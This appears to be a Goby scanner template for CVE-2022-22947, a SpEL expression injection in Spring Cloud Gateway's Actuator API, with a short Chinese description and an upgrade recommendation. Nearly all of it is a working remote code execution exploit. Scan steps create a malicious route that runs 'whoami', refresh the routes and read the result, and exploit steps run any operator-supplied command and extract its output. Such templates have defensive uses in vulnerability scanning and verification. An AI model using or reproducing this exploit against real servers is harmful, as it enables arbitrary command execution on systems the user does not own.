{ "Name": "CVE-2022-22947", "Level": "3", "Tags": [ "rce" ], "GobyQuery": "header=\"Vary: Accept-Encoding\" || Header=\"X-Cache: HIT\"", "Description": "描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。", "Product": "spring", "Homepage": "https://gobies.org/", "Author": "gobysec@gmail.com", "Impact": "

描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

", "Recommendation": "

升级版本

", "References": [ "https://gobies.org/" ], "HasExp": true, "ExpParams": [ { "Name": "cmd", "Type": "input", "Value": "whoami" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "POST", "uri": "/actuator/gateway/routes/hacktest", "follow_redirect": true, "header": { "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/json" }, "data_type": "text", "data": "{\r\n \"id\": \"hacktest\",\r\n \"filters\": [{\r\n \"name\": \"AddResponseHeader\",\r\n \"args\": {\"name\": \"Result\",\"value\": \"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"whoami\\\"}).getInputStream()))}\"}\r\n }],\r\n \"uri\": \"http://example.com\",\r\n \"order\": 0\r\n }", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "201", "bz": "" }, { "type": "item", "variable": "$head", "operation": "contains", "value": "hacktest", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] }, { "Request": { "method": "POST", "uri": "/actuator/gateway/refresh", "follow_redirect": true, "header": { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$head", "operation": "contains", "value": "", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] }, { "Request": { "method": "GET", "uri": "/actuator/gateway/routes/hacktest", "follow_redirect": true, "header": { "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "", "bz": "" } ] }, "SetVariable": [ "output|lastbody|text|" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "POST", "uri": "/actuator/gateway/routes/hacktest", "follow_redirect": true, "header": { "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Content-Type": "application/json" }, "data_type": "text", "data": "{\r\n \"id\": \"hacktest\",\r\n \"filters\": [{\r\n \"name\": \"AddResponseHeader\",\r\n \"args\": {\"name\": \"Result\",\"value\": \"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"{{{cmd}}}\\\"}).getInputStream()))}\"}\r\n }],\r\n \"uri\": \"http://example.com\",\r\n \"order\": 0\r\n }", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "201", "bz": "" }, { "type": "item", "variable": "$head", "operation": "contains", "value": "0", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] }, { "Request": { "method": "POST", "uri": "/actuator/gateway/refresh", "follow_redirect": true, "header": { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] }, { "Request": { "method": "GET", "uri": "/actuator/gateway/routes/hacktest", "follow_redirect": false, "header": { "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "predicate", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|Result = '(.*?)\\\\n'" ] } ], "PostTime": "2022-03-04 13:36:51", "GobyVersion": "1.9.325" }